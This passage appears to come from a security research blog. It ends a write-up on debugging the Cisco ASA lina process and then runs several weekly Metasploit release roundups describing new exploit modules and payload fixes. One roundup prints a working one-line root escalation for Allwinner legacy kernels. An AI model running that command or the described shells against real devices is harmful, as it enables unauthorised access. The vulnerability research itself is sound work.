Score.  We're in.  Before getting too excited, realize that having a standard shell on an ASA is not too terribly useful, but it is a crucial step towards our end goal.  Typically, the first step one takes in auditing a product for bugs is to identify and enumerate the attack surface, ie all of the inputs of the system.  In other words, where will it let you shove a bunch of A's into it.  Cisco has simplified this process for us by cramming nearly all functionality that makes an ASA more useful than a decked out Raspberry Pi into one place: the lina process.  At least in my experience, and apart from the WebVPN interface which I have not investigated, nearly all packet filtering, QoS, and protocol capabilities, among others, are handled by this process.  There may be some other binaries I've overlooked, but lina is sufficiently large and complex enough to keep one busy for a long time.


With the boot sequence hijacked, we need to find a way to cleanly start lina under gdbserver.  Fortunately, a little 'sed' goes a long way towards that end:


sed -i 's/#\(.*-g -d.*\)/\1/' /asa/scripts/rcS
sed -i 's|-g -d|-g -s /dev/ttyS0 -d|' /asa/scripts/rcS
exec /sbin/init


Without explaining in minute detail, these two sed commands basically edit the flags for lina in /asa/scripts/rcS, setting it to execute in debug mode on the serial console.  After executing the real init process with the last line, if everything went according to plan, you should soon see a screen such as this:




Finally!  You might think we're done at this point, and you wouldn't be foolish to assume so despite the fact that you'd be wrong.  From here it follows that one should be able to debug the lina process by connecting gdb over the serial line.  This is true save for one final hurdle.  The application includes a watch dog mechanism that will reboot the system should the process fail to respond to polling within a given time limit.  This is great news for those who want redundancy in their SOHO networking hardware, and bad news for those who want to take their sweet time investigating the machine state from the confines of gdb.  I considered this as a stopping point for this article, but I'm feeling generous.  Consider the following:




And consider the first few lines of my .gdbinit


set disassembly-flavor intel
target remote /dev/ttyUSB1
set *0x0A53F168=0
file ~/lina


This should get you going.  The proof of why it works is left as an exercise to the reader.


Where Do We Go From Here?


Bug hunting on this platform is our ultimate goal, but I feel the actual process of such is tangential to the aims of this article.  Still, I feel the need to offer a few pointers.  Before anything else, as soon as you are able to pull the lina binary from the file system, go ahead and begin processing it in your favorite disassembler whether you plan to statically audit code right away or not.  Remember how I said that Cisco packed nearly, if not all, functionality of the ASA into one binary?  Yea, it's huge.  I believe it took about 2 hours in IDA Pro on my Macbook, and a little less on my PC.  In any case, it was enough time to go have a cup of coffee or four.


With regards to the Cisco heap allocator and heap exploitation in general, I never thought I'd live to hear the question "What is Doug Lea's malloc?" - and this coming from people who I feel have a decent handle on more modern implementations such as the Windows Low Fragmentation Heap.  It seems a bit like learning Riemann Sums before mastering elementary algebra.  Still, I suppose it's entirely possible and becoming more commonplace as time marches on.  If you're already familiar with a more modern allocator, that's great, dlmalloc should be easy for you to pick up.  And if you're going to be doing vulnerability research on embedded devices, you definitely should pick it up.  While modern desktop operating systems have long since abandoned dlmalloc in favor of more robust solutions, variations of it pop up frequently in embedded systems given that it's simple and relatively efficient.  The most concise overview I can think to recommend would be the excellent "Once upon a free()... " written by the all-knowing anonymous and published in Phrack 57, article 0x09.  Exodus Intelligence's original report features an excellent write up on the proprietary changes Cisco built on top of dlmalloc, so I defer all vendor specific heap questions to their blog post.


Finally, for any of you asking "ok, how do I find bugs?", I'll leave you with this: you probably already know how.  If you're reading this and truly don't know where to start, I'd recommend reading the "Binary Auditing" chapter of "The Shellcoder's Handbook" or any of the innumerable references on fuzzing.  While it's true that spotting vulnerabilities takes some intuition, I believe that intuition can be learned.  There are no silver bullets.  The biggest hurdle is taking the time to do it.  That said, I certainly feel a future blog post specifically on this subject may be in order.  Happy hunting!


Special thanks to:

    Jordan Gruskovnjak of Crowdstrike [w0 (@jgrusko) | Twitter] - my empathetic sounding board who understands the agony of crashing and rebooting an ASA 12+ hours a day.

    David Barksdale - who admirably has less of an online presence than I do

    Brent Cook and everyone on the Metasploit team: proofreading and moral support



Execute My Packet:

Breaking Bricks and Plumbing Tips: pdf

Once Upon a free() ...:

    .:: Phrack Magazine ::.

The Shellcoder's Handbook: Discovering and Exploiting Security Holes:

    The Shellcoder's Handbook: Discovering and Exploiting Security Holes: 9780470080238: Computer Science Books @


     Binwalk | Firmware Analysis Tool

New Modules



First up this week, we have a new module from rastating which exploits an unauthenticated file upload vulnerability in the popular WordPress plugin, Ninja Forms.  Versions affected include those within the range of v2.9.36 to 2.9.42, and the vulnerability can be leveraged into a shell running within the security context of the web server process in a fairly silent manner.  With over 2.5 million downloads and 500k active installs, according to the developer and the Wordpress plugin repos, this silent attack could prove deadly ... sort of like a ninja ... get it?


New from @wvu is a module exploiting a recently discovered pre-auth file upload vulnerability in Ubiquiti Network's airOS, which runs on their airMAX line of devices.   Given the ease with which the module turns a file upload exploit into a privileged BusyBox shell, we recommend that affected users check with the vendor for software updates.


Also new from @wvu (he's been busy) is an exploit module targeting Oracle Application Testing Suite version  The software allows users to perform load and regression testing--among other useful features--on their web applications. Unfortunately, this version also opens a wide security hole that an attacker can easily turn into a connect-back jsp shell.  While Oracle's applications are sometimes derided as being both complex and demanding to install, the Metasploit module couldn't be easier to use.  Simply point it at the vulnerable target, allow it a moment to attempt cleaning off any exploit artifacts, and wait for your shell.  It's just that easy!


Totally wrecking the whole pre-auth file upload theme we had going ...


h00die <mike [at]> recently contributed a module for local privilege escalation vulnerability in Allwinner's (the maker of some really cool embedded devices) 3.4 legacy kernel.  Kernel-land vulnerabilities and exploits are often thought of as being quite complex, esoteric, and daunting to approach by many researchers.  Allwinner has heard these sentiments echo and made accommodations for all those in agreeance.  To exploit, type:


echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug

and you're done!.  Or, simply fire up the module by h00die and forgo the rigorous echo command.  Granted, there is a good chance that this was implemented as crutch for development and testing with perfectly altruistic intentions, but it's certainly not something you'd want to leave running on any multiuser system where you'd hope to maintain productivity.  New Armbian images were released on May 1st to address this issue, and we recommend that users look into upgrading as soon as possible.


Bug Fixes


A nasty bug existed when attempting to upgrade the python/shell_reverse_tcp_ssl payload in which send() was not sending all necessary protocol data over the connection, causing an EOF error to occur frequently.  The fix was contributed by geckom and remedies the issue by using sendall()


jhart squashed a couple of bugs and performed some maintenance within the ssh_identify_pubkeys auxiliary module.  For one, both KEY_DIR and KEY_PATH would not expand if they contained symbolic values (such as ~/bobbobthebobbob/.ssh/bobskeys.txt).  Secondly, if the key included a white list of commands that the user could run, it wouldn't be processed as all.  Finally, several unused options and some dead code snippets were removed from the module, which has now been tested and confirmed to work properly.


Our own Brent Cook (@busterbcook) tidied up and merged changes, which where originally contributed by RageLtMan, to the reverse_tcp_rc4 and bind_tcp_rc4 payloads.  This removes the static shellcode originally contained within the payload modules and implements them as assembly which is then compiled by Metasm.  Brent also squashed bugs found by @_sinn3r while auditing module ms08_067_netapi, which later proved to affect many more modules.  This fixes issues where the 'check' command would erroneously report that a host was vulnerable when in fact it wasn't, and also allows for correctly checking a range of ip addresses (as in 'check').  Not content to stop there, Brent also corrected an issue in the BrowserAutoPwn2 server where the CookieExpiration variable was not being set correctly.  Finally, in other bugfix news not involving Brent, darkbushido worked in changes to msfvenom, which fixes an issues where it would still generate a payload even if it's larger than the size option. It also no longer fails silently when invalid payload options (such as an ELF file for OS X) are specified.


Weekly Metasploit Wrapup

Posted by egypt Employee May 20, 2016

Check the computer, the mainframe computer


This week's update comes with our first ever exploit module for z/OS, the operating system used by mainframes, from our friend Bigendian Smalls who also built the payloads. The module in question is an example of authenticated code execution by design, which takes advantage of a design feature allowing users to submit jobs via uploading files to an FTP daemon.


So all we have to do is load it anywhere into the credit union mainframe, and it'll do the rest.


More movie hacking


Also this week, we have a module straight out of the movies. Long-time contributor nstarke brings us another fun RCE-by-design exploit, this time for a TP-Link surveillance camera. From a network perspective it's just another embedded Linux system, of course, but having root on one of these things means you can potentially steal surveillance video or even replace the feed with old benign images while you steal those diamonds from under the nose of that hapless security guard.


Operations center with video surveillance monitors



Documenting modules


Our friendly neighborhood exploit dev, sinn3r, recently put together a really handy system for writing module documentation in markdown. I haven't mentioned it in a Wrapup yet because I'm working on a bigger announcement, but for now it will suffice to say that markdown docs are super fun and easy to write, and that figuring out how a module is supposed to work has never been easier. From msfconsole, just type info -d and you'll get the full knowledge base for the given module.


We've already added supporting documentation for several modules, including the new mainframe exploit module mentioned above. If you've ever wanted to contribute, but don't feel like you want to write code, this is a great place to get started.


New Modules


Exploit modules (3 new)


New Modules

Auxiliary and post modules (2 new)

Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.26...4.12.2


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.


Weekly Metasploit Wrapup

Posted by egypt Employee May 11, 2016

Resolve, v. transitive


Sometimes the biggest things that make working with a tool fun are the small things. One of those things is the recent addition of a resolve command for Meterpreter. It does what it sounds like: it resolves a hostname to an IP address on the victim system, taking advantage of the local DNS. Of course, that's not a huge thing, but it is pretty convenient.


Strut, v. intransitive


This update also comes with a fun exploit for Apache Struts, a web framework for webby things. It's a Model-View-Controller framework for Java web applications, somewhat similar to Rails in the ruby world. Bugs in frameworks like this can end up lasting a lot longer than in applications, as all the things that depend on it have to be updated too.


Magick, n.


Also in this update is a shiny new exploit module for the latest Branded Vulnerability(tm), ImageTragick. In this case though, it can actually get you shells. As the advisory explains, this is a command injection vulnerability in the way image metadata is passed to a conversion utility. It's tough to gauge how useful this will be since it depends a lot on how applications use ImageMagick, but the potential is pretty shiny. If you've found something that uses it in a vulnerable way, it sure would be keen if you'd let us know and even more awesome would be a module for it in a new Pull Request.


Committer, n.


In great open-source-land news, we've added a new committer! As Tod mentioned the last time this happened, new committers don't come along very often and when they do it's usually surprising to learn that they aren't already committers because they've been around for quite a while. Mubix has been a long-time friend of the Metasploit family, helping out with code review, module development, and lots of testing. He has also helped countless people learn about Metasploit features with his fabulous Metasploit Minute series with Hak5.


5907607001_b3954dfaa9_b.jpgThe open source community has always been integral to Metasploit. Adding new Committers increases the Bus Factor of the project. Non-Rapid7 Committers are super important for the vitality of the project and help cement the relationship between Rapid7 and the community.


Also, Mubix is a personal friend of mine and I think he's a hoopy frood who really knows where his towel is. I'm excited to see how he'll use his new-found powers.


In fact, he's already landed his first Pull Request, which brings me to...


Portfwd, n.


Some of the most fun you can have with Meterpreter is by sending your evil packets through it. One way to do that is the portfwd command, which allows you to do what it sounds like -- forward connections from one port to another. This works pretty similarly to portfwarding in SSH, except that previously, it was only possible to listen on the attack platform and forward connections to the victim's network. As of this update, you can go the other direction as well. By setting up a reverse forward, you can tell Meterpreter to listen on the victim system and have it forwarded back to the network where Metasploit is running. For the latest in fun stuff happening in Meterpreter land, I recommend checking out OJ's recent bloggery on the subject.


New Modules


Exploit modules (3 new)


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.23...4.11.26


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

Filter Blog

By date: By tag: